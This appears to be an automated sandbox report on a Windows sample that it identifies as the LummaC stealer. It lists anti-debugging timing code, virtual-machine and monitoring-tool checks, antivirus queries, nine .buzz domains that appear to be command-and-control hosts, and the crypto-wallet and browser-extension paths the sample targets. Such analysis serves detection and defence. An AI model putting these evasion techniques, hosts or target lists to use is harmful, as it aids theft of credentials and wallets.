                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E0E24 second address: 53E0E65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, CEh 0x00000005 jmp 00007F61286B7189h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F61286B717Eh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F61286B717Eh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E0E65 second address: 53E0E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D90Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E0E77 second address: 53E0E7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E0E7B second address: 53E0E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c call 00007F612923D913h 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E0F2E second address: 53E0F33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0B9A second address: 53F0BF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D917h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F612923D916h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F612923D910h 0x00000016 cmp dword ptr [75AB459Ch], 05h 0x0000001d pushad 0x0000001e movzx eax, dx 0x00000021 mov esi, edx 0x00000023 popad 0x00000024 je 00007F619989B719h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0BF8 second address: 53F0C06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0CFC second address: 53F0D3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D919h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e popad 0x0000000f call 00007F61998A2759h 0x00000014 push 75A52B70h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov eax, dword ptr [esp+10h] 0x00000024 mov dword ptr [esp+10h], ebp 0x00000028 lea ebp, dword ptr [esp+10h] 0x0000002c sub esp, eax 0x0000002e push ebx 0x0000002f push esi 0x00000030 push edi 0x00000031 mov eax, dword ptr [75AB4538h] 0x00000036 xor dword ptr [ebp-04h], eax 0x00000039 xor eax, ebp 0x0000003b push eax 0x0000003c mov dword ptr [ebp-18h], esp 0x0000003f push dword ptr [ebp-08h] 0x00000042 mov eax, dword ptr [ebp-04h] 0x00000045 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004c mov dword ptr [ebp-08h], eax 0x0000004f lea eax, dword ptr [ebp-10h] 0x00000052 mov dword ptr fs:[00000000h], eax 0x00000058 ret 0x00000059 jmp 00007F612923D912h 0x0000005e sub esi, esi 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0D3E second address: 53F0D58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7186h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0D58 second address: 53F0D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0D5E second address: 53F0D94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-1Ch], esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F61286B717Ah 0x00000017 sbb eax, 323808B8h 0x0000001d jmp 00007F61286B717Bh 0x00000022 popfd 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0DFA second address: 53F0E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D914h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0E12 second address: 53F0E96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F61286B7184h 0x00000014 xor ax, 7968h 0x00000019 jmp 00007F61286B717Bh 0x0000001e popfd 0x0000001f movzx eax, bx 0x00000022 popad 0x00000023 je 00007F6198D0ACABh 0x00000029 pushad 0x0000002a jmp 00007F61286B7181h 0x0000002f pushfd 0x00000030 jmp 00007F61286B7180h 0x00000035 xor ah, FFFFFFF8h 0x00000038 jmp 00007F61286B717Bh 0x0000003d popfd 0x0000003e popad 0x0000003f cmp dword ptr [ebp+08h], 00002000h 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0E96 second address: 53F0E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0E9A second address: 53F0EA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400973 second address: 5400997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, 33C2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F612923D915h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400997 second address: 54009CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7181h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F61286B7188h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 54009CB second address: 54009D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 54009D1 second address: 54009EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 54009EA second address: 54009F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 322Eh 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 54009F3 second address: 5400A5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F61286B7182h 0x00000009 and ecx, 5791D878h 0x0000000f jmp 00007F61286B717Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ax, dx 0x0000001f pushfd 0x00000020 jmp 00007F61286B7183h 0x00000025 sbb esi, 6F59BCEEh 0x0000002b jmp 00007F61286B7189h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400A5A second address: 5400A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D90Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400C22 second address: 5400C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400C26 second address: 5400C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400C2C second address: 5400C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F61286B717Ah 0x00000009 sub ah, 00000018h 0x0000000c jmp 00007F61286B717Bh 0x00000011 popfd 0x00000012 mov cx, 2FCFh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F61286B7181h 0x00000021 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSpecial instruction interceptor: First address: AF8AAB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSpecial instruction interceptor: First address: C9B346 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSpecial instruction interceptor: First address: D2B5FA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe TID: 1424Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe TID: 1836Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: cFLK1CiiNK.exe, 00000000.00000002.1481403617.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: cFLK1CiiNK.exe, 00000000.00000003.1424449031.0000000001746000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424471508.000000000169B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Welcome to the wnlplqemuadyyma
                Source: cFLK1CiiNK.exe, 00000000.00000003.1424449031.0000000001746000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424471508.000000000169B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]Welcome to the wnlplqemuadyyma
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: cFLK1CiiNK.exe, 00000000.00000003.1400622014.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000002.1482281782.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480612636.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1324894763.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424818548.00000000016CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: cFLK1CiiNK.exe, 00000000.00000003.1400622014.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000002.1482281782.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480612636.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1324894763.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424818548.00000000016CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWc
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: cFLK1CiiNK.exe, 00000000.00000002.1481403617.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: cFLK1CiiNK.exe, 00000000.00000002.1482208142.0000000001687000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480191552.0000000001687000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(+m
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: SICE
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
                Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
                Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: mindhandru.buzz
                Source: cFLK1CiiNK.exe, 00000000.00000002.1481403617.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: YProgram Manager
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: cFLK1CiiNK.exe, cFLK1CiiNK.exe, 00000000.00000003.1424777027.0000000005D42000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000002.1482281782.00000000016AB000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480191552.00000000016AB000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424818548.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424471508.00000000016AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: cFLK1CiiNK.exe PID: 3592, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: cFLK1CiiNK.exeString found in binary or memory: Wallets/Electrum
                Source: cFLK1CiiNK.exeString found in binary or memory: Wallets/ElectronCash
                Source: cFLK1CiiNK.exeString found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
                Source: cFLK1CiiNK.exeString found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
                Source: cFLK1CiiNK.exe, 00000000.00000003.1442617492.000000000171F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]
                Source: cFLK1CiiNK.exeString found in binary or memory: Wallets/Exodus
                Source: cFLK1CiiNK.exeString found in binary or memory: %appdata%\Ethereum
                Source: cFLK1CiiNK.exe, 00000000.00000003.1400622014.000000000169B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: cFLK1CiiNK.exeString found in binary or memory: keystore
                Source: cFLK1CiiNK.exe, 00000000.00000003.1400622014.00000000016E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets\S
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
